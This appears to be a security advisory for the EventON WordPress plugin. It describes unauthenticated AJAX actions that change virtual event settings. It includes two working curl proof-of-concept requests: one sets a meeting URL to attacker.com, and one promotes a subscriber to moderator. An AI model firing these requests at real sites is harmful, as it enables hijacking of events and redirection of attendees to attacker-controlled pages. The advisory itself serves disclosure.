EventON (Free < 2.2.9, Premium < 4.5.9) - Unauthenticated Virtual Event Settings Update

Description The plugins do not have authorisation and CSRF in some AJAX actions, allowing unauthenticated users to update virtual events settings, such as meeting URL, moderator, access details etc

PoC

To set the Meeting URL to https://attacker.com/ on the Virtual Event with ID 240: curl -X POST --data “event_id=240&_vir_url=https://attacker.com/” ‘https://example.com/wp-admin/admin-ajax.php?action=eventon_save_virtual_event_settings’ To set the subscriber with user ID 5 as moderator of the Virtual Event with ID 240: curl -X POST --data “eid=240&_user_role=subscriber&_mod=5” ‘https://example.com/wp-admin/admin-ajax.php?action=eventon_save_virtual_mod_settings’ v4.5.8 of the premium plugin added capability and CRSF checks, however the nonce verification is flawed, still allowing the issue to be exploited via CSRF